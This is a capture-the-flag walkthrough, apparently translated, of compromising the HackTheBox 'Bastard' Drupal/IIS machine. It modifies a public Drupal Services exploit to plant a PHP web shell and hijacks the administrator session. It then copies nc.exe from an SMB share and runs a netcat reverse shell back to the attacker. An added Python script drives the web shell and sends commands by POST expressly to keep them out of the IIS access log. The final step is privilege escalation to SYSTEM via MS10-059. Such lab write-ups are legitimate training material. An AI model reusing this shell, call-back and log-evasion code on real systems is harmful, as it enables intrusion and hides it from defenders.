nikto
┌──(kali㉿kali)-[~]
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.9
+ Target Hostname: 10.10.10.9
+ Target Port: 80
+ Start Time:
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ARRAY(0x5608ccc56a20)
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=comment/reply/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 68 entries which should be manually viewed.
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ OSVDB-3092: /LICENSE.TXT: License file found may identify site software.
+ 8757 requests: 10 error(s) and 39 item(s) reported on remote host
+ End Time: 2021-06-23 20:50:40 (GMT9) (21122 seconds)
---------------------------------------------------------------------------
dirb
┌──(kali㉿kali)-[~]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME:
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
※ Interrupted partway through.
gobuster
gobuster dir -u http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -o bastard.gobuster
※ Not run.
┌──(kali㉿kali)-[~]
└─$ searchsploit drupal 7
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash Exploitation Vector | php/webapps/4510.txt
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (M | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multipl | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb
-------------------------------------------------------------------------------------------- ---------------------------------
Let's take a look at the code for 41564.
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 41564
Exploit: Drupal 7.x Module Services - Remote Code Execution
Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: ASCII text, with CRLF line terminators
Copied to: /home/kali/41564.php
┌──(kali㉿kali)-[~]
└─$ cat 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Exploit Author: Charles FOL
#!/usr/bin/php
<?php
# Drupal Services Module Remote Code Execution Exploit
# cf
#
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
# along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
#
# Initialization
error_reporting(E_ALL);
define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'dixuSOspsOUU.php',
'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];
※ The rest is omitted.
Change the highlighted values above to match your environment. $endpoint_path is the URL path of the Services REST endpoint (/rest on this host), while $endpoint stays the endpoint's machine name, which the exploit uses to look up the Services cache entry. The 'data' entry is replaced with a minimal web shell that runs whatever is passed in the cmd parameter:
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'dixuSOspsOUU.php',
'data' => '<?php system($_REQUEST["cmd"]); ?>'
];
┌──(kali㉿kali)-[~/bastard]
└─$ php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/dixuSOspsOUU.php

┌──(kali㉿kali)-[~/bastard]
└─$ ls
41564.php  session.json  user.json
The header comment lines are echoed because they sit before the <?php tag; that is harmless. The exploit has written the web shell to the web root and saved the administrator's session and user details in session.json and user.json.
Enter the session name and ID that the exploit stored in session.json into the Firefox add-on "Cookie Manager" and access the site again.
(Screenshot: Firefox add-on "Cookie Manager")
(Screenshot: "Cookie Manager" settings)
After applying the cookie and reloading the Bastard page, we are browsing with the administrator's session.
(Screenshot: access with the administrator's session)
From here, I saw several articles that upload PHP code to obtain a reverse shell, but the attack did not work in my environment, so I will take a different approach.
Request the file that 41564.php wrote as 'filename' => 'dixuSOspsOUU.php', appending the cmd parameter:
http://10.10.10.9/dixuSOspsOUU.php?cmd=whoami
(Screenshot: command execution)
The command passed in the parameter was executed.
Next, get nc running on Bastard.
Copying nc
┌──(kali㉿kali)-[~/bastard]
└─$ cp /usr/share/windows-binaries/nc.exe /home/kali/bastard/
Starting the SMB server
Downloading Impacket
┌──(kali㉿kali)-[~/bastard]
In the /opt/impacket directory, run the following command to start an SMB server that shares /home/kali/bastard under the name "kali":
┌──(kali㉿kali)-[/opt/impacket]
└─$ sudo smbserver.py kali /home/kali/bastard
In the same way as the command run on Bastard earlier, request the following:
http://10.10.10.9/dixuSOspsOUU.php?cmd=copy%20\\10.10.14.14\kali\nc.exe%20nc.exe
(Screenshot: copying nc)
nc.exe is now on Bastard, so start a listener on the Kali side and then connect back from Bastard. (The listener address below, 10.10.14.29, differs from the SMB server address used above; use whatever address your Kali VPN interface currently has.)
http://10.10.10.9/dixuSOspsOUU.php?cmd=nc.exe 10.10.14.29 4444 -e cmd.exe
(Screenshot: obtaining a console)
The shell does not run as SYSTEM, so we continue with privilege escalation.
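The three web-shell requests above (whoami, the copy from the SMB share, the nc call-back) are typed as raw URLs, and the copy command is the one that most often breaks: the backslashes and spaces must be percent-encoded, and a stray space after %20 ends up inside the command. The script below is an added example, not part of the original write-up: it builds the requests with the standard library so that encoding is handled for you, and sends them as POST bodies, which $_REQUEST accepts just like the query string and which keeps the command out of the IIS access log (IIS logs the query string, not the body). The web-shell path is the one written by 41564.php above; the attacker address, share name and port are assumptions matching the values used in this write-up.

```python
"""Drive the PHP web shell written by 41564.php (added example)."""
import urllib.parse
import urllib.request

# Path written by the exploit above. The attacker-side values are assumptions
# matching this write-up: Kali VPN address, smbserver.py share name, nc port.
WEBSHELL = "http://10.10.10.9/dixuSOspsOUU.php"
ATTACKER_IP = "10.10.14.14"
SMB_SHARE = "kali"
LISTEN_PORT = 4444


def build_get_url(base, cmd):
    """GET form: urlencode() percent-encodes backslashes, spaces and quotes."""
    return base + "?" + urllib.parse.urlencode({"cmd": cmd})


def build_post(base, cmd):
    """POST form: $_REQUEST reads the body too, and the body is not written
    to the IIS access log, unlike the query string of a GET."""
    body = urllib.parse.urlencode({"cmd": cmd}).encode()
    return urllib.request.Request(base, data=body, method="POST")


def run(cmd, base=WEBSHELL, timeout=10, use_post=True):
    """Send one command to the web shell and return its output as text."""
    if use_post:
        req = build_post(base, cmd)
    else:
        req = urllib.request.Request(build_get_url(base, cmd))
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def stage_commands(ip=ATTACKER_IP, share=SMB_SHARE, port=LISTEN_PORT):
    """The three commands used in the write-up, in order."""
    return [
        "whoami",
        # raw string: the backslashes are literal, .format() fills the fields
        r"copy \\{ip}\{share}\nc.exe nc.exe".format(ip=ip, share=share),
        "nc.exe {ip} {port} -e cmd.exe".format(ip=ip, port=port),
    ]


if __name__ == "__main__":
    whoami, copy_nc, callback = stage_commands()
    print(run(whoami))        # expect the IIS application pool identity
    print(run(copy_nc))       # smbserver.py must already be serving nc.exe
    try:
        # The call-back does not return while the shell is open, so a timeout
        # here is the expected outcome once nc.exe has reached the listener.
        run(callback, timeout=5)
    except OSError:
        pass
```

Start the nc listener on Kali before running the script; the final request only returns when the spawned cmd.exe exits, which is why it is given a short timeout and the timeout is swallowed.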
Privilege escalation
To find candidate vulnerabilities, use Windows-Exploit-Suggester.
sudo git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
Update the Suggester's bulletin database:
python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update
Save the output of systeminfo run on Bastard as a text file, move it to Kali, and run the following command:
┌──(kali㉿kali)-[/opt/Windows-Exploit-Suggester]
└─$ sudo python3 ./windows-exploit-suggester.py --database 2021-08-07-mssb.xls --systeminfo /home/kali/bastard/bastard.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
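The suggester compared 0 hotfix(es) against 197 bulletins, so every bulletin for this OS was listed; before trusting that, confirm that the systeminfo dump really has no Hotfix(s) entries, and keep in mind that a later cumulative update can supersede a bulletin's KB without that exact KB ever appearing in the list. The script below is an added example, not the suggester's own code: it parses two constructed systeminfo dumps (one with "Hotfix(s): N/A", one with KBs listed; neither is the real Bastard output) and filters the suggester output above down to the local elevation-of-privilege bulletins whose KB is not installed.

```python
"""Cross-check suggester output against the systeminfo hotfix list (added example)."""
import re

# Constructed, abridged systeminfo dumps (not the real Bastard output).
SYSTEMINFO_UNPATCHED = """\
Host Name:                 EXAMPLE-UNPATCHED
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

SYSTEMINFO_PATCHED = """\
Host Name:                 EXAMPLE-PATCHED
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
"""

# Copied from the Windows-Exploit-Suggester output above.
SUGGESTER_OUTPUT = """\
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
"""

FIELD_RE = re.compile(r"^([A-Za-z()/ ]+?):\s+(.*)$")      # 'OS Name:   value'
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")                 # '[01]: KB982799'
BULLETIN_RE = re.compile(
    r"^\[([EM*])\]\s*(MS\d{2}-\d{3}):\s*(.*?)\s*\((\d+)\)\s*-\s*(\w+)\s*$"
)


def parse_systeminfo(text):
    """Pull OS name/version, architecture and the installed KB list out of systeminfo."""
    info = {"hotfixes": [], "hotfix_count_claimed": 0}
    for line in text.splitlines():
        kb = KB_RE.search(line)
        if kb:
            info["hotfixes"].append(kb.group(1))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group(1).strip(), m.group(2).strip()
        if key == "OS Name":
            info["os_name"] = val
        elif key == "OS Version":
            info["os_version"] = val.split()[0]
        elif key == "System Type":
            info["arch"] = "64-bit" if val.startswith("x64") else "32-bit"
        elif key == "Hotfix(s)":
            n = re.match(r"\d+", val)
            info["hotfix_count_claimed"] = int(n.group()) if n else 0  # 'N/A' -> 0
    return info


def hotfix_list_consistent(info):
    """The count on the Hotfix(s) line should equal the number of [NN]: KB lines."""
    return len(info["hotfixes"]) == info["hotfix_count_claimed"]


def parse_suggester(text):
    """One dict per bulletin line: tag ([E]/[M]/[*]), id, title, KB, severity."""
    out = []
    for line in text.splitlines():
        m = BULLETIN_RE.match(line.strip())
        if m:
            tag, bid, title, kb, severity = m.groups()
            out.append({"tag": tag, "id": bid, "title": title,
                        "kb": "KB" + kb, "severity": severity})
    return out


def privesc_candidates(systeminfo_text, suggester_text):
    """Local EoP bulletins with a public exploit whose KB is not in systeminfo."""
    installed = set(parse_systeminfo(systeminfo_text)["hotfixes"])
    return [
        b["id"] for b in parse_suggester(suggester_text)
        if "Elevation of Privilege" in b["title"]
        and b["tag"] in ("E", "M")
        and b["kb"] not in installed
    ]


if __name__ == "__main__":
    for name, dump in (("unpatched", SYSTEMINFO_UNPATCHED), ("patched", SYSTEMINFO_PATCHED)):
        info = parse_systeminfo(dump)
        print(name, info["os_name"], info["os_version"], info["arch"],
              "hotfixes:", info["hotfixes"], "consistent:", hotfix_list_consistent(info))
        print("  EoP candidates:", privesc_candidates(dump, SUGGESTER_OUTPUT))
```

On the unpatched dump all five elevation-of-privilege bulletins survive, MS10-059 among them; on the patched one MS10-059 (KB982799) and MS11-011 (KB2393802) drop out. Absence of a KB is still only a hint: a bulletin replaced by a later roll-up will look "missing" here exactly as it does in the suggester's own output.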
Of the results above, we use MS10-059 for privilege escalation.
Running MS10-059.exe on Bastard gave us SYSTEM privileges.
(Screenshot: privilege escalation succeeded)